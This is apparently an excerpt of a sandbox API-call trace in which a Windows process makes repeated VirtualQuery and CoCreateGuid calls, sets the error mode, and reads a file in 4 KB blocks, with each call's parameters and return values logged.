	[0062.334] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.334] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.335] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.335] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.335] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.335] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.335] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.335] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x28d535d8, Data2=0xb6c, Data3=0x472d, Data4=([0]=0x8b, [1]=0x77, [2]=0x54, [3]=0x22, [4]=0x55, [5]=0xa5, [6]=0x5b, [7]=0xb7))) returned 0x0
	[0062.336] VirtualQuery (in: lpAddress=0x278f60, lpBuffer=0x3500279e20, dwLength=0x30 | out: lpBuffer=0x3500279e20*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.336] VirtualQuery (in: lpAddress=0x278f60, lpBuffer=0x3500279e20, dwLength=0x30 | out: lpBuffer=0x3500279e20*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.336] VirtualQuery (in: lpAddress=0x278ff0, lpBuffer=0x3500279eb0, dwLength=0x30 | out: lpBuffer=0x3500279eb0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.336] VirtualQuery (in: lpAddress=0x278f60, lpBuffer=0x3500279e20, dwLength=0x30 | out: lpBuffer=0x3500279e20*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.336] VirtualQuery (in: lpAddress=0x278ff0, lpBuffer=0x3500279eb0, dwLength=0x30 | out: lpBuffer=0x3500279eb0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.337] VirtualQuery (in: lpAddress=0x278f60, lpBuffer=0x3500279e20, dwLength=0x30 | out: lpBuffer=0x3500279e20*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.337] VirtualQuery (in: lpAddress=0x278ff0, lpBuffer=0x3500279eb0, dwLength=0x30 | out: lpBuffer=0x3500279eb0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.337] VirtualQuery (in: lpAddress=0x278f60, lpBuffer=0x3500279e20, dwLength=0x30 | out: lpBuffer=0x3500279e20*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.337] VirtualQuery (in: lpAddress=0x278ff0, lpBuffer=0x3500279eb0, dwLength=0x30 | out: lpBuffer=0x3500279eb0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.337] VirtualQuery (in: lpAddress=0x278f60, lpBuffer=0x3500279e20, dwLength=0x30 | out: lpBuffer=0x3500279e20*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.338] VirtualQuery (in: lpAddress=0x278ff0, lpBuffer=0x3500279eb0, dwLength=0x30 | out: lpBuffer=0x3500279eb0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.338] VirtualQuery (in: lpAddress=0x278f60, lpBuffer=0x3500279e20, dwLength=0x30 | out: lpBuffer=0x3500279e20*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.338] VirtualQuery (in: lpAddress=0x278ff0, lpBuffer=0x3500279eb0, dwLength=0x30 | out: lpBuffer=0x3500279eb0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.338] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.338] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.339] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.339] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.339] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.339] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.339] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.339] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.340] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.340] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x8d61801e, Data2=0xfe1f, Data3=0x4835, Data4=([0]=0x98, [1]=0x73, [2]=0x99, [3]=0x30, [4]=0x7d, [5]=0x41, [6]=0xcb, [7]=0xf0))) returned 0x0
	[0062.340] VirtualQuery (in: lpAddress=0x278d30, lpBuffer=0x3500279bf0, dwLength=0x30 | out: lpBuffer=0x3500279bf0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.340] VirtualQuery (in: lpAddress=0x278a00, lpBuffer=0x35002798c0, dwLength=0x30 | out: lpBuffer=0x35002798c0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.340] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.341] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.341] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.341] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.341] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.341] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.342] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.342] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.342] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.342] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.342] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.343] VirtualQuery (in: lpAddress=0x278c20, lpBuffer=0x3500279ae0, dwLength=0x30 | out: lpBuffer=0x3500279ae0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.343] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.343] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.343] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.343] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.343] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xc35d188e, Data2=0xbbba, Data3=0x4972, Data4=([0]=0x87, [1]=0x7a, [2]=0xf4, [3]=0xf2, [4]=0x44, [5]=0x3a, [6]=0x1f, [7]=0x76))) returned 0x0
	[0062.344] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x4b860166, Data2=0x12f4, Data3=0x4cef, Data4=([0]=0xa2, [1]=0x77, [2]=0xc0, [3]=0x33, [4]=0xe9, [5]=0x69, [6]=0x87, [7]=0xa8))) returned 0x0
	[0062.344] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.344] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.344] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xa96e1b04, Data2=0xfab7, Data3=0x4d2d, Data4=([0]=0xbe, [1]=0xb2, [2]=0xa8, [3]=0xbb, [4]=0x9a, [5]=0x16, [6]=0x66, [7]=0xc1))) returned 0x0
	[0062.344] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.345] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.345] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x4f7b0d70, Data2=0xaa28, Data3=0x42cb, Data4=([0]=0x85, [1]=0x71, [2]=0xb1, [3]=0x86, [4]=0xae, [5]=0xfb, [6]=0xe3, [7]=0x98))) returned 0x0
	[0062.345] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.345] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.346] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x766e4d0d, Data2=0xcb6e, Data3=0x4691, Data4=([0]=0x82, [1]=0x69, [2]=0x37, [3]=0xac, [4]=0xe2, [5]=0xb5, [6]=0xa9, [7]=0xaa))) returned 0x0
	[0062.346] VirtualQuery (in: lpAddress=0x278d30, lpBuffer=0x3500279bf0, dwLength=0x30 | out: lpBuffer=0x3500279bf0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.346] VirtualQuery (in: lpAddress=0x278dc0, lpBuffer=0x3500279c80, dwLength=0x30 | out: lpBuffer=0x3500279c80*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.346] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x43240528, Data2=0xc652, Data3=0x48dd, Data4=([0]=0xa2, [1]=0x26, [2]=0x12, [3]=0x38, [4]=0x4e, [5]=0xbc, [6]=0x68, [7]=0xa3))) returned 0x0
	[0062.347] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.347] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.347] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xc2ef1f07, Data2=0x329a, Data3=0x4425, Data4=([0]=0xa0, [1]=0xaa, [2]=0xa2, [3]=0x3, [4]=0x9d, [5]=0xa3, [6]=0xf5, [7]=0x9b))) returned 0x0
	[0062.348] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xf73a7686, Data2=0x8a0c, Data3=0x4225, Data4=([0]=0xbd, [1]=0xb2, [2]=0x64, [3]=0xff, [4]=0xbf, [5]=0xbf, [6]=0xe3, [7]=0x10))) returned 0x0
	[0062.348] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.349] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.349] GetFileType (hFile=0x690) returned 0x1
	[0062.349] ReadFile (in: hFile=0x690, lpBuffer=0x233e4d63ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4d63ed8*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0062.352] ReadFile (in: hFile=0x690, lpBuffer=0x233e4d63ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4d63ed8*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0062.353] ReadFile (in: hFile=0x690, lpBuffer=0x233e4d63ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4d63ed8*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0062.354] ReadFile (in: hFile=0x690, lpBuffer=0x233e4d63ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4d63ed8*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0062.356] ReadFile (in: hFile=0x690, lpBuffer=0x233e4d63ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4d63ed8*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0062.363] VirtualQuery (in: lpAddress=0x279040, lpBuffer=0x3500279f00, dwLength=0x30 | out: lpBuffer=0x3500279f00*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.363] VirtualQuery (in: lpAddress=0x279040, lpBuffer=0x3500279f00, dwLength=0x30 | out: lpBuffer=0x3500279f00*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.364] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x5141b35e, Data2=0x4017, Data3=0x46b1, Data4=([0]=0x9d, [1]=0xcb, [2]=0x7, [3]=0xc3, [4]=0x82, [5]=0x66, [6]=0xe3, [7]=0x63))) returned 0x0
	[0062.364] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x49d7125d, Data2=0x33c2, Data3=0x4b7c, Data4=([0]=0x92, [1]=0x75, [2]=0xbe, [3]=0x2f, [4]=0xa3, [5]=0x22, [6]=0x26, [7]=0xc9))) returned 0x0
	[0062.364] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xca2ba073, Data2=0x97d4, Data3=0x47a8, Data4=([0]=0xa5, [1]=0x3a, [2]=0x4a, [3]=0x38, [4]=0x71, [5]=0xd8, [6]=0xb, [7]=0x6c))) returned 0x0
	[0062.365] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x3830aa73, Data2=0x181, Data3=0x4718, Data4=([0]=0xb7, [1]=0xac, [2]=0x7c, [3]=0x35, [4]=0xea, [5]=0xdf, [6]=0x10, [7]=0xae))) returned 0x0
	[0062.365] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x641e0e85, Data2=0x9b26, Data3=0x4274, Data4=([0]=0xbc, [1]=0xc7, [2]=0xba, [3]=0x9, [4]=0xee, [5]=0xd5, [6]=0x8e, [7]=0x9b))) returned 0x0
	[0062.365] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x88d6e3dd, Data2=0x1c01, Data3=0x433e, Data4=([0]=0xa6, [1]=0xb5, [2]=0x48, [3]=0xed, [4]=0x2c, [5]=0xf8, [6]=0xa2, [7]=0x2f))) returned 0x0
	[0062.365] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xdd85fe8c, Data2=0x1f8, Data3=0x4855, Data4=([0]=0xb8, [1]=0xe6, [2]=0x3b, [3]=0x3d, [4]=0xc3, [5]=0xb6, [6]=0x8f, [7]=0xe))) returned 0x0
	[0062.366] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.366] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x790dc2df, Data2=0xd65f, Data3=0x4564, Data4=([0]=0xa3, [1]=0x60, [2]=0xde, [3]=0x6d, [4]=0x86, [5]=0xbc, [6]=0x8, [7]=0xda))) returned 0x0
	[0062.366] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x46d6f870, Data2=0xe5fe, Data3=0x44ff, Data4=([0]=0x83, [1]=0x68, [2]=0x9e, [3]=0x91, [4]=0xa9, [5]=0xd9, [6]=0x6b, [7]=0x8f))) returned 0x0
	[0062.366] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x8608e9b7, Data2=0x1c01, Data3=0x4b41, Data4=([0]=0x98, [1]=0x66, [2]=0xa, [3]=0x5f, [4]=0x24, [5]=0x58, [6]=0x9c, [7]=0xb6))) returned 0x0
	[0062.367] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x37d566a7, Data2=0xcdee, Data3=0x40a3, Data4=([0]=0xbc, [1]=0xdd, [2]=0x5c, [3]=0x19, [4]=0xe2, [5]=0x7e, [6]=0xda, [7]=0x78))) returned 0x0
	[0062.367] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.367] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x263fdd09, Data2=0xc108, Data3=0x46d1, Data4=([0]=0xb6, [1]=0xf4, [2]=0x57, [3]=0x59, [4]=0xbb, [5]=0xb9, [6]=0x74, [7]=0xd3))) returned 0x0
